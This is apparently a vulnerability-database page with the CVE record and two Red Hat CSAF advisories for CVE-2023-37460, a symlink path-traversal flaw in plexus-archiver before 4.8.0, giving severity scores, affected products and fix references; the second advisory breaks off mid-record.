cve-2023-37460
Vulnerability from cvelistv5
Vendor | Product | Version |
---|---|---|
codehaus-plexus | plexus-archiver | < 4.8.0 |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T17:16:29.488Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m", "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m" }, { "name": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2", "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2" }, { "name": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0", "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0" } ], "title": "CVE Program Container" }, { "affected": [ { "cpes": [ "cpe:2.3:a:codehaus-plexus:plexus-archiver:*:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "plexus-archiver", "vendor": "codehaus-plexus", "versions": [ { "lessThan": "4.8.0", "status": "affected", "version": "0", "versionType": "custom" } ] } ], "metrics": [ { "other": { "content": { "id": "CVE-2023-37460", "options": [ { "Exploitation": "poc" }, { "Automatable": "no" }, { "Technical Impact": "total" } ], "role": "CISA Coordinator", "timestamp": "2024-10-03T19:09:14.939906Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-10-03T19:09:55.667Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "product": "plexus-archiver", "vendor": "codehaus-plexus", "versions": [ { "status": "affected", "version": "\u003c 4.8.0" } ] } ], "descriptions": [ { "lang": "en", "value": "Plexis Archiver is a collection of Plexus components to 
create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink\u0027s source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry\u0027s content to the symlink\u0027s target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-22", "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)", "lang": "en", "type": "CWE" } ] }, { "descriptions": [ { "cweId": "CWE-61", "description": "CWE-61: UNIX Symbolic Link (Symlink) Following", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-07-25T19:41:46.096Z", "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "shortName": "GitHub_M" }, "references": [ { "name": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m", "tags": [ "x_refsource_CONFIRM" ], "url": 
"https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m" }, { "name": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2", "tags": [ "x_refsource_MISC" ], "url": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2" }, { "name": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0", "tags": [ "x_refsource_MISC" ], "url": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0" } ], "source": { "advisory": "GHSA-wh3p-fphp-9h2m", "discovery": "UNKNOWN" }, "title": "Plexus Archiver vulnerable to Arbitrary File Creation in AbstractUnArchiver" } }, "cveMetadata": { "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "assignerShortName": "GitHub_M", "cveId": "CVE-2023-37460", "datePublished": "2023-07-25T19:41:46.096Z", "dateReserved": "2023-07-06T13:01:36.997Z", "dateUpdated": "2024-10-03T19:09:55.667Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1", "vulnerability-lookup:meta": { "fkie_nvd": { "configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:codehaus-plexus:plexus-archiver:*:*:*:*:*:*:*:*\", \"versionEndExcluding\": \"4.8.0\", \"matchCriteriaId\": \"9C596F2F-8933-41D5-A4C9-25F5EC82D26A\"}]}]}]", "descriptions": "[{\"lang\": \"en\", \"value\": \"Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. 
When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink\u0027s source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry\u0027s content to the symlink\u0027s target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue.\"}]", "id": "CVE-2023-37460", "lastModified": "2024-11-21T08:11:45.130", "metrics": "{\"cvssMetricV31\": [{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 8.1, \"baseSeverity\": \"HIGH\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 2.2, \"impactScore\": 5.9}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 9.8, \"baseSeverity\": \"CRITICAL\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 5.9}]}", "published": "2023-07-25T20:15:13.703", "references": "[{\"url\": 
\"https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Release Notes\"]}, {\"url\": \"https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Exploit\", \"Vendor Advisory\"]}, {\"url\": \"https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Release Notes\"]}, {\"url\": \"https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Vendor Advisory\"]}]", "sourceIdentifier": "security-advisories@github.com", "vulnStatus": "Modified", "weaknesses": "[{\"source\": \"security-advisories@github.com\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-22\"}, {\"lang\": \"en\", \"value\": \"CWE-61\"}]}]" }, "nvd": "{\"cve\":{\"id\":\"CVE-2023-37460\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2023-07-25T20:15:13.703\",\"lastModified\":\"2024-11-21T08:11:45.130\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. 
Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink\u0027s source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry\u0027s content to the symlink\u0027s target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.2,\"impactScore\":5.9},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"},{\"la
ng\":\"en\",\"value\":\"CWE-61\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:codehaus-plexus:plexus-archiver:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"4.8.0\",\"matchCriteriaId\":\"9C596F2F-8933-41D5-A4C9-25F5EC82D26A\"}]}]}],\"references\":[{\"url\":\"https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}" } }
rhsa-2023_6138
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "An update is now available for Migration Toolkit for Runtimes.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Security Fix(es):\n\n* plexus-archiver: Arbitrary File Creation in AbstractUnArchiver (CVE-2023-37460)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2023:6138", "url": "https://access.redhat.com/errata/RHSA-2023:6138" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important" }, { "category": "external", "summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=migration.toolkit.runtimes\u0026downloadType=distributions", "url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=migration.toolkit.runtimes\u0026downloadType=distributions" }, { "category": "external", "summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2023-003", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2023-003" }, { "category": "external", "summary": "2242288", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288" }, { "category": "external", "summary": "WINDUPRULE-1038", "url": "https://issues.redhat.com/browse/WINDUPRULE-1038" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2023/rhsa-2023_6138.json" } ], "title": "Red Hat Security Advisory: Migration Toolkit for Runtimes security update", "tracking": { "current_release_date": "2024-12-17T23:05:47+00:00", "generator": { "date": "2024-12-17T23:05:47+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.3" } }, "id": "RHSA-2023:6138", "initial_release_date": "2023-10-26T10:05:45+00:00", "revision_history": [ { "date": 
"2023-10-26T10:05:45+00:00", "number": "1", "summary": "Initial version" }, { "date": "2023-10-26T10:05:45+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-12-17T23:05:47+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Migration Toolkit for Runtimes 1 on RHEL 8", "product": { "name": "Migration Toolkit for Runtimes 1 on RHEL 8", "product_id": "Migration Toolkit for Runtimes 1 on RHEL 8", "product_identification_helper": { "cpe": "cpe:/a:redhat:migration_toolkit_runtimes:1.0::el8" } } } ], "category": "product_family", "name": "Migration Toolkit for Runtimes" } ], "category": "vendor", "name": "Red Hat" } ] }, "vulnerabilities": [ { "cve": "CVE-2023-37460", "cwe": { "id": "CWE-61", "name": "UNIX Symbolic Link (Symlink) Following" }, "discovery_date": "2023-10-05T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2242288" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Plexus Archiver. While using AbstractUnArchiver for extracting, an archive might lead to arbitrary file creation and possible remote code execution (RCE). Extracting an archive with an entry in the destination directory as a symbolic link whose target does not exist will bypass the directory destination verification.", "title": "Vulnerability description" }, { "category": "summary", "text": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver", "title": "Vulnerability summary" }, { "category": "other", "text": "There are factors beyond the attacker\u0027s control. For example, the victim\u0027s server must have an incomplete SSH server configuration by not having the \"~/.ssh/authorized_keys\" existent and also having an SSH Server Port externally accessible. 
So, an attacker would need, even in other scenarios, to gather configuration settings and previous knowledge about the environment in order to have a successful attack. The impact is Important as code execution might happen, but it is not guaranteed.\n\nRed Hat Fuse 7 contains plexus-archiver as a transitive dependency and does not make it vulnerable during runtime, hence the low impact.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Migration Toolkit for Runtimes 1 on RHEL 8" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2023-37460" }, { "category": "external", "summary": "RHBZ#2242288", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2023-37460", "url": "https://www.cve.org/CVERecord?id=CVE-2023-37460" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460" }, { "category": "external", "summary": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m", "url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m" }, { "category": "external", "summary": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/", "url": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/" } ], "release_date": "2023-07-25T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-10-26T10:05:45+00:00", "details": "For details on how to apply this update, which includes 
the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "Migration Toolkit for Runtimes 1 on RHEL 8" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:6138" }, { "category": "workaround", "details": "No mitigations are available for this issue.", "product_ids": [ "Migration Toolkit for Runtimes 1 on RHEL 8" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "Migration Toolkit for Runtimes 1 on RHEL 8" ] } ], "threats": [ { "category": "impact", "details": "Important" } ], "title": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver" } ] }
rhsa-2023:6886
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "An update for plexus-archiver is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "The Plexus project provides a full software stack for creating and executing software projects. Based on the Plexus container, the applications can utilise component-oriented programming to build modular, reusable components that can easily be assembled and reused. The plexus-archiver component provides functions to create and extract archives.\n\nSecurity Fix(es):\n\n* plexus-archiver: Arbitrary File Creation in AbstractUnArchiver (CVE-2023-37460)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2023:6886", "url": "https://access.redhat.com/errata/RHSA-2023:6886" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important" }, { "category": "external", "summary": "2242288", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2023/rhsa-2023_6886.json" } ], "title": "Red Hat Security Advisory: plexus-archiver security update", "tracking": { "current_release_date": "2025-01-06T05:00:10+00:00", "generator": { "date": "2025-01-06T05:00:10+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.5" } }, "id": "RHSA-2023:6886", "initial_release_date": "2023-11-13T09:42:49+00:00", "revision_history": [ { "date": "2023-11-13T09:42:49+00:00", "number": "1", "summary": "Initial version" }, { "date": "2023-11-13T09:42:49+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2025-01-06T05:00:10+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat Enterprise Linux Client Optional (v. 7)", "product": { "name": "Red Hat Enterprise Linux Client Optional (v. 
7)", "product_id": "7Client-optional-7.9.Z", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:7::client" } } }, { "category": "product_name", "name": "Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product": { "name": "Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.9.Z", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:7::computenode" } } }, { "category": "product_name", "name": "Red Hat Enterprise Linux Server Optional (v. 7)", "product": { "name": "Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.9.Z", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:7::server" } } }, { "category": "product_name", "name": "Red Hat Enterprise Linux Workstation Optional (v. 7)", "product": { "name": "Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.9.Z", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:7::workstation" } } } ], "category": "product_family", "name": "Red Hat Enterprise Linux" }, { "branches": [ { "category": "product_version", "name": "plexus-archiver-0:2.4.2-6.el7_9.src", "product": { "name": "plexus-archiver-0:2.4.2-6.el7_9.src", "product_id": "plexus-archiver-0:2.4.2-6.el7_9.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/plexus-archiver@2.4.2-6.el7_9?arch=src" } } } ], "category": "architecture", "name": "src" }, { "branches": [ { "category": "product_version", "name": "plexus-archiver-0:2.4.2-6.el7_9.noarch", "product": { "name": "plexus-archiver-0:2.4.2-6.el7_9.noarch", "product_id": "plexus-archiver-0:2.4.2-6.el7_9.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/plexus-archiver@2.4.2-6.el7_9?arch=noarch" } } }, { "category": "product_version", "name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "product": { "name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "product_id": 
"plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/plexus-archiver-javadoc@2.4.2-6.el7_9?arch=noarch" } } } ], "category": "architecture", "name": "noarch" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch" }, "product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch", "relates_to_product_reference": "7Client-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src" }, "product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src", "relates_to_product_reference": "7Client-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch" }, "product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "relates_to_product_reference": "7Client-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 
7)", "product_id": "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch" }, "product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch", "relates_to_product_reference": "7ComputeNode-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src" }, "product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src", "relates_to_product_reference": "7ComputeNode-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch" }, "product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "relates_to_product_reference": "7ComputeNode-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch" }, "product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch", "relates_to_product_reference": "7Server-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src" }, "product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src", "relates_to_product_reference": "7Server-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Server Optional (v. 
7)", "product_id": "7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch" }, "product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", "relates_to_product_reference": "7Server-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch" }, "product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch", "relates_to_product_reference": "7Workstation-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src" }, "product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src", "relates_to_product_reference": "7Workstation-optional-7.9.Z" }, { "category": "default_component_of", "full_product_name": { "name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch" }, "product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch", 